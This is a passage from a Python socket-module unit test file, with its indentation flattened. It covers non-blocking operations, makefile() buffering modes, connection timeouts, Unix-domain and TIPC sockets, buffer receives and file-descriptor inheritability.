self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
